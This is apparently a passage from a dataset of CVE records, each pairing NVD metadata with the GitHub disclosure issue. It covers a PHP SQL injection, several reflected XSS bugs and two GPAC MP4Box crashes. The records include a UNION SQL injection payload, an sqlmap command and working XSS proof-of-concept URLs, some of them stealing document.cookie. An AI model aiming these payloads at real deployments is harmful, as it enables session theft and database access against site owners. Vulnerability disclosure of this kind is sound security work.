NULL,CONCAT(0x716a6b7a71,0x426a7571504a64794848634c78575652497a6d484678516c59526e44754466777978416d6f55574c,0x7176626b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - ``` <img width="394" alt="2" src="https://github.com/Cormac315/cve/assets/129538275/30a2794d-f1a0-4cb8-9cab-4f8f65cbcc97"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.1.138:2223//property-detail.php?id=1" --batch --dbs ``` <img width="362" alt="3" src="https://github.com/Cormac315/cve/assets/129538275/d92248f5-ba8f-4fe6-98ba-5d1a417f90c4"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Real Estate Management System Project In PHP v1.0 property-detail.php SQL injection
https://api.github.com/repos/Cormac315/cve/issues/1/comments
0
2024-06-15T11:23:56Z
2024-06-15T11:23:57Z
https://github.com/Cormac315/cve/issues/1
2,354,765,014
1
6,081
CVE-2024-37619
2024-06-17T14:15:10.943
StrongShop v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the spec_group_id parameter at /spec/index.blade.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/Hebing123/cve/issues/45" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.strongshop.cn/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/Hebing123/cve/issues/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.strongshop.cn/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:strongshop:strongshop:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C00D0882-D77C-4C00-BC4C-D0F94A2649D8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Hebing123/cve/issues/45
[ "Exploit" ]
github.com
[ "Hebing123", "cve" ]
# Summary StrongShop v1.0 has a Reflective Cross-Site Scripting (XSS) vulnerability located in the file `resources/views/admin/product/spec/index.blade.php`. # Details The vulnerability is located in the script tag. The application does not escape the user-supplied `spec_group_id` parameter before including it in the HTML output, leading to a reflective XSS vulnerability. ``` var spec_group_id = '{!!request('spec_group_id')!!}'; var tableConfig = { cols: [cols] ,where:{spec_group_id:spec_group_id} }; Util.renderTable(tableConfig); }(); </script> ``` # Proof of Concept (PoC) http://192.168.0.10:1019/admin/product/spec/index?spec_group_id='%3C/script%3E%3Csvg%20onload=alert(1)%3E%3Cscript%3E ![image](https://github.com/Hebing123/cve/assets/66168888/5b3175a4-7efa-4d29-ab66-3e57fcbe4d7f)
StrongShop v1.0 has a reflected XSS vulnerability
https://api.github.com/repos/Hebing123/cve/issues/45/comments
1
2024-05-30T02:50:20Z
2024-06-21T02:34:30Z
https://github.com/Hebing123/cve/issues/45
2,324,586,619
45
6,082
CVE-2024-37624
2024-06-17T14:15:11.680
Xinhu RockOA v2.6.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the /chajian/inputChajian.php. component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Technical Description" ], "url": "https://github.com/rainrocka/xinhu/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description" ], "url": "https://github.com/rainrocka/xinhu/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockoa:xinhu:2.6.3:*:*:*:*:*:*:*", "matchCriteriaId": "D6357A91-F746-425E-91F6-6AEFD6F1C66C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/rainrocka/xinhu/issues/6
[ "Exploit", "Technical Description" ]
github.com
[ "rainrocka", "xinhu" ]
# Summary A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Xinhu RockOA v2.6.3. # Details The XSS vulnerability originates from `/include/chajian/inputChajian.php`: https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/include/chajian/inputChajian.php#L100 https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/include/chajian/inputChajian.php#L271-L296 https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/include/chajian/inputChajian.php#L129-L142 https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/webmain/flow/page/input_bookborrow.html#L1 An interesting aspect of this vulnerability is that it cannot be identified using conventional Static Application Security Testing (SAST) methods. This is due to the developers' approach of enhancing code flexibility and streamlined management by utilizing `$arr` and `$oarr` to collect and process multiple parameters or options. Consequently, extracting complete parameters and their values becomes challenging, as they might not be present within this php script. Hence, this highlights the necessity of Dynamic Application Security Testing (DAST). Upon analysis, we have determined that the controllable parameters at present include: `def_bookid`,`def_bookname`, `def_yjdt`, `def_jydt` and `def_explain`. Notably, each of these parameters is susceptible to XSS vulnerabilities. # Proof of Concept (PoC) `http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_explain=%3C/textarea%3E%3Csvg/onload=alert(document.cookie)%3E` `http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_bookname=%22%3E%3Csvg/onload=alert(document.cookie)%3E` `http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_yjdt=%22%3E%3Csvg/onload=alert(document.cookie)%3E` `http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_jydt=%22%3E%3Csvg/onload=alert(document.cookie)%3E` `http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_bookid=%22%3E%3Csvg/onload=alert(document.cookie)%3E` ![image](https://github.com/rainrocka/xinhu/assets/66168888/12dfb29a-93e2-45a4-b529-7f4ad0c81407)
Reflected XSS Vulnerability in Xinhu RockOA v2.6.3
https://api.github.com/repos/rainrocka/xinhu/issues/6/comments
0
2024-05-31T07:18:27Z
2024-05-31T07:43:01Z
https://github.com/rainrocka/xinhu/issues/6
2,327,130,572
6
6,083
CVE-2024-37625
2024-06-17T14:15:11.790
zhimengzhe iBarn v1.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the $search parameter at /index.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/zhimengzhe/iBarn" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Technical Description" ], "url": "https://github.com/zhimengzhe/iBarn/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/zhimengzhe/iBarn" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description" ], "url": "https://github.com/zhimengzhe/iBarn/issues/20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zhimengzhel:ibarn:1.5:*:*:*:*:*:*:*", "matchCriteriaId": "B3DA9D8B-BD04-47E5-8D46-78B2F6EBC874", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/zhimengzhe/iBarn/issues/20
[ "Exploit", "Technical Description" ]
github.com
[ "zhimengzhe", "iBarn" ]
# Summary A reflected Cross Site Scripting (XSS) vulnerability exists in iBarn v1.5 due to improper sanitization of the `$search` parameter in the `html/index.php`, `html/pay.php`, and `html/own.php` files. Although the `htmlspecialchars` function is used to encode HTML entities, the developers utilized the flag `ENT_NOQUOTES`, which does not encode single or double quotes, leading to the vulnerability. # Details The misuse of the htmlspecialchars function allows the injection of JavaScript code into the search field, which can be exploited for XSS attacks. html/index.php: ``` <input type="text" class="form-control" id="search" name="search" value="<?php echo htmlspecialchars($_REQUEST['search'], ENT_NOQUOTES); ?>" placeholder="<?php echo t('搜你想要'); ?>"> ``` html/pay.php: ``` <input type="text" class="form-control" id="search" name="search" value="<?php echo htmlspecialchars($_REQUEST['search'], ENT_NOQUOTES); ?>" placeholder="搜你想要"> ``` html/own.php: ``` <input type="text" class="form-control" id="search" name="search" value="<?php echo htmlspecialchars($_REQUEST['search'], ENT_NOQUOTES); ?>" placeholder="<?php echo t('搜你想要'); ?>"> ``` # Proof of Concept (PoC) ``` http(s)://ip:port/index.php?search=1%22%20onmouseover=alert(document.cookie)%20bad=%221 ``` ![image](https://github.com/zhimengzhe/iBarn/assets/66168888/c8d70300-1da7-42cf-8ad9-c4e9cf603bc0) # Differentiation from CVE-2024-26471 This vulnerability is distinct from CVE-2024-26471 as it specifically targets the $search parameter processed through the htmlspecialchars function and then bypasses filtering. Although CVE-2024-26471 only mentioned that the search field in `html/offer.php` lacks any filtering, our investigation revealed that several other pages (`shareme.php`, `recycle.php`, `collection.php`, `pub.php`, `myshare.php`) also do not filter the `$search` parameter, leading to multiple cross-site scripting (XSS) vulnerabilities.
iBarn v1.5 has a reflected XSS vulnerability
https://api.github.com/repos/zhimengzhe/iBarn/issues/20/comments
0
2024-06-03T10:35:48Z
2024-06-03T10:35:48Z
https://github.com/zhimengzhe/iBarn/issues/20
2,330,789,142
20
6,084
CVE-2024-6061
2024-06-17T20:15:14.850
A vulnerability has been found in GPAC 2.5-DEV-rev228-g11067ea92-master and classified as problematic. Affected by this vulnerability is the function isoffin_process of the file src/filters/isoffin_read.c of the component MP4Box. The manipulation leads to infinite loop. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of the patch is 20c0f29139a82779b86453ce7f68d0681ec7624c. It is recommended to apply a patch to fix this issue. The identifier VDB-268789 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 1.7, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "LOCAL", "availabilityRequirement": "NOT_DEFINED", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/20c0f29139a82779b86453ce7f68d0681ec7624c" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2871" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/user-attachments/files/15801058/poc1.zip" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268789" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268789" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.356308" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/20c0f29139a82779b86453ce7f68d0681ec7624c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2871" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/user-attachments/files/15801058/poc1.zip" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268789" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268789" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.356308" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.5-dev-rev288-g11067ea92-master:*:*:*:*:*:*:*", "matchCriteriaId": "8CB1A488-697C-4770-B217-33A7F8403E77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/gpac/gpac/issues/2871
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## version ```shell ./MP4Box -version MP4Box - GPAC version 2.5-DEV-rev228-g11067ea92-master (c) 2000-2024 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ## reproduce Complie and run ``` ./configure --enable-sanitizer make ./MP4Box -dash 1000 -out /dev/null poc1 ``` Information ``` ··· [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 [IsoMedia] Failed to fetch initial sample 1 for track 3 ··· ``` ## poc [poc1.zip](https://github.com/user-attachments/files/15801058/poc1.zip)
Infinite loop in MP4Box
https://api.github.com/repos/gpac/gpac/issues/2871/comments
0
2024-06-12T08:30:30Z
2024-06-12T13:25:17Z
https://github.com/gpac/gpac/issues/2871
2,348,153,606
2,871
6,085
CVE-2024-6062
2024-06-17T20:15:15.170
A vulnerability was found in GPAC 2.5-DEV-rev228-g11067ea92-master and classified as problematic. Affected by this issue is the function swf_svg_add_iso_sample of the file src/filters/load_text.c of the component MP4Box. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The patch is identified as 31e499d310a48bd17c8b055a0bfe0fe35887a7cd. It is recommended to apply a patch to fix this issue. VDB-268790 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 1.7, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "LOCAL", "availabilityRequirement": "NOT_DEFINED", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/31e499d310a48bd17c8b055a0bfe0fe35887a7cd" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2872" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/user-attachments/files/15801126/poc2.zip" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268790" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268790" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.356314" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/31e499d310a48bd17c8b055a0bfe0fe35887a7cd" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2872" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/user-attachments/files/15801126/poc2.zip" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268790" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268790" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.356314" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.5-dev-rev288-g11067ea92-master:*:*:*:*:*:*:*", "matchCriteriaId": "8CB1A488-697C-4770-B217-33A7F8403E77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2872
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## version ```shell ./MP4Box -version MP4Box - GPAC version 2.5-DEV-rev228-g11067ea92-master (c) 2000-2024 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ## reproduce Complie and run ``` ./configure --enable-sanitizer make ./MP4Box -dash 1000 -out /dev/null poc2 ``` Information ```shell SWF Import - Scene Size 320x240 - 139 frames @ 25 FPS [TXTIn] swf -> svg not fully migrated, using SWF flags 0 and no flatten angle. Patch welcome [Dasher] No template assigned, using $File$_dash$FS$$Number$ [Dasher] No bitrate property assigned to PID poc2, computing from bitstream [SWF Parsing] Tag MX1 (0x3c) not implemented - skipping (frame 1) [SWF Parsing] Placing unfound object (ID 0) (frame 1) [SWF Parsing] Tag MX2 (0x3d) not implemented - skipping (frame 1) [SWF Parsing] Accessing empty depth level 1 (frame 2) [SWF Parsing] Moving unfound object (ID 0) (frame 2) [SWF Parsing] Tag MX2 (0x3d) not implemented - skipping (frame 2) filters/load_text.c:2534:3: runtime error: null pointer passed as argument 2, which is declared to never be null ``` ## poc [poc2.zip](https://github.com/user-attachments/files/15801126/poc2.zip)
Null pointer deference in filters/load_text.c:2534
https://api.github.com/repos/gpac/gpac/issues/2872/comments
0
2024-06-12T08:31:34Z
2024-06-12T13:31:34Z
https://github.com/gpac/gpac/issues/2872
2,348,155,759
2,872
6,086
CVE-2024-6063
2024-06-17T21:15:51.443
